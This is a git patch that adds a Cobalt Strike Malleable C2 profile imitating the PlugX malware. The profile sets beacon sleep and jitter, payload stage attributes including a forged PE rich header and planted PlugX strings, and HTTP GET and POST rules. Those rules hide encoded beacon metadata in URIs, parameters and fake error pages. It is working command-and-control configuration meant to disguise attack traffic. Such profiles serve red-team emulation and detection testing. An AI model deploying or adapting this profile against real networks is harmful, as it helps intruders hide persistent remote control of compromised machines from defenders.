From 39dff44dc182ff43478c0d1ed2ac4466c28f37ec Mon Sep 17 00:00:00 2001
From: Rahmat Nurfauzi <rahmat.nf42@gmail.com>
Date: Mon, 16 Jan 2023 15:32:21 +0700
Subject: [PATCH] Create plugx.profile

Cobalt Strike Malleable C2 Profile - PlugX
---
 plugx.profile | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 plugx.profile

diff --git a/plugx.profile b/plugx.profile
new file mode 100644
index 0000000..ffc6ff1
--- /dev/null
+++ b/plugx.profile
@@ -0,0 +1,106 @@
+#
+# PlugX Profile
+# Author: @infosecn1nja
+#
+# https://github.com/silence-is-best/c2db/blob/master/README.md
+
+set sleeptime "30000"; # use a ~30s delay between callbacks
+set jitter    "10"; # throw in a 10% jitter
+
+stage {
+    set checksum       "0";
+    set compile_time   "28 Jun 2018 04:38:07";
+    set entry_point    "5968";
+    set name           "Shellcode.dll";
+    set rich_header    "\x02\x8c\xde\x7b\x46\xed\xb0\x28\x46\xed\xb0\x28\x46\xed\xb0\x28\x00\xbc\x6f\x28\x42\xed\xb0\x28\x4f\x95\x23\x28\x4f\xed\xb0\x28\x46\xed\xb1\x28\x5b\xed\xb0\x28\x4b\xbf\x55\x28\x7d\xed\xb0\x28\x4b\xbf\x6c\x28\x47\xed\xb0\x28\x4b\xbf\x6e\x28\x47\xed\xb0\x28\x52\x69\x63\x68\x46\xed\xb0\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+
+    # obfuscations
+    set userwx "true";
+    set stomppe "false";
+
+    # strings
+    stringw "/update?id=%8.8x";
+    stringw "VVubPDixKeBURoQIIyfb";
+    stringw "https";
+    stringw "POST";
+    stringw "POST";
+    string "d:\\work";
+    string "plug2.5";
+    string "Plug3.0";
+    string "Shell6";
+}
+
+http-get {
+
+    set uri "/";
+
+    client {
+
+        header "Accept" "*/*";
+        header "Cookie" "QhTbeUW+YzYYsZWz0PQvBvYIgo8=";
+        header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)";
+        header "Connection" "Keep-Alive";
+        header "Cache-Control" "no-cache";
+
+        metadata {
+            base64url;
+            uri-append;
+        }
+    }
+
+    server {
+        header "Server" "nginx";
+        header "Content-Type" "text/html;charset=UTF-8";
+        header "Cache-Control" "no-cache";
+        header "Pragma" "no-cache";
+        header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT";
+        header "X-Server" "ip-172-31-28-245";
+        header "Set-Cookie" "JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly";
+
+        output {
+            base64url;        
+            prepend "............?";
+            append "..]..2.........   :...Q.";
+            print;
+        }
+    }
+}
+
+http-post {
+
+    set uri "/update";
+
+    client {
+    
+        header "User-Agent" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;";
+        header "Accept" "*/*";
+        header "x-debug" "0";
+        header "x-request" "0";
+        header "x-content" "61456";
+        header "x-storage" "1";
+        header "Cache-Control" "no-cache";
+
+        id {
+            netbios;
+            parameter "wd";
+        }
+
+        output {
+            print;
+        }
+    }
+
+    server {
+        header "Server" "Apache 1.3.27";
+        header "Accept-Ranges" "bytes";
+        header "Cache" "no-cache";
+        header "Content-Type" "text/html";
+
+        output {
+            netbios;
+            prepend "<HTML><BODY><B>The Page You Requested Was Not Found!</B></BODY></HTML>";
+            print;
+        }
+    }
+}